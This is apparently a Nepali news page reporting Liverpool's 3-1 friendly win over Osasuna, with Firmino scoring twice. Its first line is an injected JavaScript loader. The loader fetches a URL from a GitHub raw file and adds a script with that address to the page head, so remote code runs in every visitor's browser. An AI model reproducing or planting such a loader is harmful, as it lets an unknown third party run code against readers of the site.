;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्यूज, काठमाडौं । रोवर्टो फिर्निनोको दुई गोल मद्दतमा लिभरपुलले प्रिसिजन अन्तर्गतको मैत्रीपूर्ण खेलमा ओसासुनालाई पराजित गरेको छ ।
सोमबार राति भएको खेलमा इंग्लिस क्लब लिभरपुलले स्पानिस क्लब ओसासुनालाई ३-१ ले पराजित गरेको हो ।
ओसासुनाका जेसस एरेसोले आत्मघाती गोल गरेपछि लिभरपुलले अग्रता लिएको थियो | घरेलु मैदान एनफिल्डमा भएको खेलमा लिभरपुलले पहिलो हाफमै तीन गोल गरेको हो |
फिर्मिनोले २१औं र ४१औं मिनेटमा गोल गरेपछि लिरपुलले पहिलो हाफमै ३-० को अग्रता बनायो ।
ओसासुनाका लागि ७० औं मिनेटमा किकेले एक गोल फर्काएका थिए ।
फेसबुक प्रतिक्रियाहरु